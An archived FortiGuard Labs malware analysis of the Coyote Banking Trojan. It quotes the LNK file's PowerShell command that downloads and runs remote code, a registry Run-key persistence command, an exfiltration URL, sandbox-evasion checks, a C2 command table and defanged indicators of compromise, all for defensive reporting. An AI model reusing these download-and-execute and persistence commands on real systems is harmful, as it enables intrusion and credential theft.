{
	"id": "bdac6d7b-2e52-4766-b448-e773ac54c8e6",
	"created_at": "2026-04-06T00:09:56.581642Z",
	"updated_at": "2026-04-10T03:22:08.577534Z",
	"deleted_at": null,
	"sha1_hash": "898cebf5fd29f7b7846441d66a5bdd33a7014ab1",
	"title": "Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7535881,
	"plain_text": "Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard\r\nLabs\r\nBy Cara Lin\r\nPublished: 2025-01-30 · Archived: 2026-04-05 19:49:25 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Microsoft Windows\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity Level: High\r\nOver the past month, FortiGuard Labs has identified several similar LNK files containing PowerShell commands designed\r\nto execute malicious scripts and connect to remote servers. These files are part of multi-stage operations that ultimately\r\ndeliver the Coyote Banking Trojan. This malware primarily targets users in Brazil, seeking to harvest sensitive information\r\nfrom over 70 financial applications and numerous websites. Once deployed, the Coyote Banking Trojan can carry out\r\nvarious malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive\r\ncredentials. In this article, we will detail the behavior of each stage.\r\nFigure 1: Telemetry\r\nLNK File\r\nThe LNK file executes the following PowerShell command, which connects to a remote server to initiate the next stage: -w\r\nhid -noni -ep Bypass -c “Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri\r\n‘hxxps://tbet[.]geontrigame[.]com/zxchzzmism’ -UseBasicParsing).Content }; Start-Sleep 131.”\r\nFigure 2: LNK file\r\nWe analyzed multiple malicious files by examining the “Machine ID” embedded within the LNK files. This unique identifier\r\nprovides critical insights into the system where the LNK file originated. By extracting and analyzing this metadata, we\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 1 of 11\n\ntraced connections to other malicious LNK files associated with Coyote.\r\n \r\nURLs in Arguments Machine ID MAC Address\r\nhxxps://tbet.geontrigame[.]com/zxchzzmism 0cb44b707681 aa:1c:b2:83:1d:72\r\nhxxps://hrod.geontrigame[.]com/edsfluzevj a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://easi.geontrigame[.]com/wydqfchssb a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://iivi.geontrigame[.]com/zkrghotqvy a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://cuzo.geontrigame[.]com/pxylqhpuiv a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://btee.geontrigame[.]com/mvkrouhawm dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://qmnw.daowsistem[.]com/fayikyeund dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://bhju.daowsistem[.]com/iwywybzqxk dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://lgfd.daowsistem[.]com/riqojhyvnr dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://leme.daowsistem[.]com/omzowcicwp dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://igow.scortma[.]com/fqieghffbm dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://quit.scortma[.]com/xzcpnnfhxi dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://llue.geontrigame[.]com/byyyfydxyf dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://cxmp.scortma[.]com/qfutdbtqqu dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://xrxw.scortma[.]com/gmdroacyvi dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://qfab.geontrigame[.]com/vfofnzihsm dc0bfa46899d e8:a5:d6:6a:57:02\r\nThe content in “zxchzzmism” is an additional PowerShell script that holds two encoded data segments. This script employs\r\nspecific commands to decode and execute the embedded shellcode, initiating the next phase of the malicious operation.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 2 of 11\n\nFigure 3: PowerShell script\r\nLoader and Shellcode\r\nThe “bmwiMcDec” DLL file functions as a loader, utilizing VirtualAllocEx and WriteProcessMemory to inject the\r\n“npuGDec” payload. It then employs CreateRemoteThread to execute the injected malicious code, facilitating the\r\ncontinuation of the attack.\r\nFigure 4: MSIL loader\r\nThe injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate\r\nLanguage) payloads. This ensures seamless delivery and execution of the attack’s next stage.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 3 of 11\n\nFigure 5: Decrypt and get the MSIL file\r\nThe decrypted MSIL execution file first establishes persistence by modifying the registry at\r\n“HCKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.” It checks for any existing PowerShell command in this registry\r\nentry. If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry\r\ncontains a customized PowerShell command pointing to download and execute a Base64-encoded URL, which facilitates\r\nthe main functions of the Coyote Banking Trojan. The targeted URL for this operation is\r\n“hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw.”\r\nFigure 6: Registry's setting\r\nIf the victim is the new target, it gathers basic system information, such as the machine name, username, and operating\r\nsystem, and sends it to a remote server. It also identifies installed antivirus products by querying the SecurityCenter2\r\nnamespace in Windows Management Instrumentation (WMI). The collected data is then concatenated with a “|” separator,\r\nencoded in Base64, and the resulting string is reversed. This processed string is appended as a parameter and sent back to the\r\nremote server as follows: “hxxps://yezh[.]geontrigame[.]com/hqizjs/?\r\nl=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzlmcoNEf0IDR0Ul(omit).”\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 4 of 11\n\nFigure 7: Send system's information\r\nAfter setting and checking in, it calls “CreateProcess” to execute the PowerShell command that was added into the registry\r\nto invoke the payload:\r\n \r\npowershell -w hid -noni -ep Bypass -c “$w=New-Object Net.WebClient;$u=\r\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW\r\n$w.DownloadString($u).”\r\nCoyote Banking Trojan\r\nThe payload “vxewhcacbfqnsw” is similar to the one downloaded from the LNK file but is noticeably larger. This increase\r\nin size is due to the inclusion of the main Coyote Baking Trojan.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 5 of 11\n\nFigure 8: PowerShell script\r\nWe obtained the MSIL file after decrypting the payload from the Donut shellcode. It contained the following functions:\r\nUsername Checking: It examines the username to see if any of the following test/sandbox names are present:\r\nJohnson, Miller, malware, maltest, CurrentUser, Sandbox, virus, John Doe, test user, sand box,\r\nWDAGUtilityAccount, Bruno, George, and Harry Johnson.\r\nVirtual Management Tool Checking: It examines whether the environment contains files or folders related to virtual\r\nmachines. It checks for strings in the directory “C:\\Windows\\System32” such as qemu-ga, qemuwmi, balloon.sys,\r\nnetkvm.sys, vioinput, viofs.sys, and vioser.sys.\r\nBuild Targeting List: In this version, Coyote expands its target list to include 1,030 sites and 73 financial agents,\r\nincluding mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br,\r\nblumenhotelboutique.com.br, and fallshotel.com.br. It then starts monitoring the active window.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 6 of 11\n\nFigure 9: Build a target list\r\nFigure 10: Connect to server\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 7 of 11\n\nCommunicate with C2: Coyote continuously monitors the active window to detect if the victim attempts to access\r\nany target sites. If a target site is accessed, it contacts the C2 server via port 443. The server list includes\r\ngeraatualiza[.]com, masterdow[.]com, and geraupdate[.]com. Coyote reads a message from a remote server,\r\nprocesses it by decoding and cleaning the data, and prepares it for further actions based on the length of the first\r\nstring in the message.\r\nLength Description\r\n10 Disconnect from server\r\n11 Terminate program\r\n12 Take screenshot as image/jpeg\r\n13 Get a window's title bar text\r\n14 Activate a window and restore it to its original size\r\n15 Minimize a window\r\n16 Activate a window and restore it to its normal size then display it as a maximized window\r\n17 Kill targeted process\r\n18 Show full-screen overlay\r\n19 Restore a window and then maximize it\r\n20 Remove the window handle\r\n21 Shut down the device\r\n22 Enable the Desktop Window Manager composition feature then shut down the device\r\n23 Click mouse at a specific screen position\r\n24 Copy a string to the clipboard and then simulate typing that string\r\n25\r\nSend the specified keys to the active application. If a key contains a ‘+,’ it is sent as an\r\nuppercase character; otherwise, it is sent as a lowercase character.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 8 of 11\n\n26 Disable DWM composition\r\n27\r\nDisplay the fake image for a specific target with a message. For example: “Trabalhando nas\r\natualiza” (Working on updates), “Aponte a câmera para a imagem a seguir” (Point the camera\r\nat the following image)\r\n28 Cleanup, unhook, and stop current monitoring\r\n29 Control user-visible windows, close the window\r\n30 Adjust the opacity\r\n31 Enable keylogger or send the keylogger’s result with separator ‘¾’\r\n32 N/A\r\n33\r\nSimulate key presses to perform automated navigation actions: {UP}, {RIGHT}, {DOWN},\r\nand {LEFT}\r\n34 Manipulate display settings\r\n35 Send the given keys\r\nConclusion\r\nCoyote's infection process is complex and multi-staged. This attack leveraged an LNK file for initial access, which\r\nsubsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity,\r\nparticularly because it has the potential to expand beyond its initial targets. Consequently, it highlights the critical need for\r\nrobust security measures for both individuals and institutions to safeguard against evolving cyber threats.\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 9 of 11\n\nFigure 11: Attack chain\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nLNK/Agent.D!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine\r\nis part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nThe FortiGuard Web Filtering Service blocks the C2 server.\r\nWe also suggest that organizations go through Fortinet’s free cybersecurity training module: Fortinet Certified Fundamentals\r\n(FCF) in Cybersecurity. This module is designed to help end users learn how to identify and protect themselves from\r\nphishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard\r\nIncident Response Team.\r\nIOCs\r\nURLs\r\nhxxps://btee[.]geontrigame[.]com/mvkrouhawm\r\njxxps://qmnw[.]daowsistem[.]com/fayikyeund\r\nhxxps://bhju[.]daowsistem[.]com/iwywybzqxk\r\nhxxps://lgfd[.]daowsistem[.]com/riqojhyvnr\r\nhxxps://leme[.]daowsistem[.]com/omzowcicwp\r\nhxxps://igow[.]scortma[.]com/fqieghffbm\r\nhxxps://quit[.]scortma[.]com/xzcpnnfhxi\r\nhxxps://llue[.]geontrigame[.]com/byyyfydxyf\r\nhxxps://cxmp[.]scortma[.]com/qfutdbtqqu\r\nhxxps://xrxw[.]scortma[.]com/gmdroacyvi\r\nhxxps://qfab[.]geontrigame[.]com/vfofnzihsm\r\nhxxps://tbet[.]geontrigame[.]com/zxchzzmism\r\nhxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw\r\nHosts\r\ngeraatualiza[.]com\r\nmasterdow[.]com\r\ngeraupdate[.]com\r\nFiles\r\n362af8118f437f9139556c59437544ae1489376dc4118027c24c8d5ce4d84e48\r\n330dffe834ebbe4042747bbe00b4575629ba8f2507bccf746763cacf63d655bb\r\n33cba89eeeaf139a798b7fa07ff6919dd0c4c6cf4106b659e4e56f15b5809287\r\n552d53f473096c55a3937c8512a06863133a97c3478ad6b1535e1976d1e0d45f\r\n64209e2348e6d503ee518459d0487d636639fa5e5298d28093a5ad41390ef6b0\r\n67f371a683b2be4c8002f89492cd29d96dceabdbfd36641a27be761ee64605b1\r\n73ad6be67691b65cee251d098f2541eef3cab2853ad509dac72d8eff5bd85bc0\r\n7cbfbce482071c6df823f09d83c6868d0b1208e8ceb70147b64c52bb8b48bdb8\r\n839de445f714a32f36670b590eba7fc68b1115b885ac8d689d7b344189521012\r\nbea4f753707eba4088e8a51818d9de8e9ad0138495338402f05c5c7a800695a6\r\nf3c37b1de5983b30b9ae70c525f97727a56d3874533db1a6e3dc1355bfbf37ec\r\nfd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 10 of 11\n\nSource: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 11 of 11\n\n https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files \nFigure 9: Build a target list \nFigure 10: Connect to server \n  Page 7 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files"
	],
	"report_names": [
		"coyote-banking-trojan-a-stealthy-attack-via-lnk-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434196,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.pdf",
		"text": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.txt",
		"img": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.jpg"
	}
}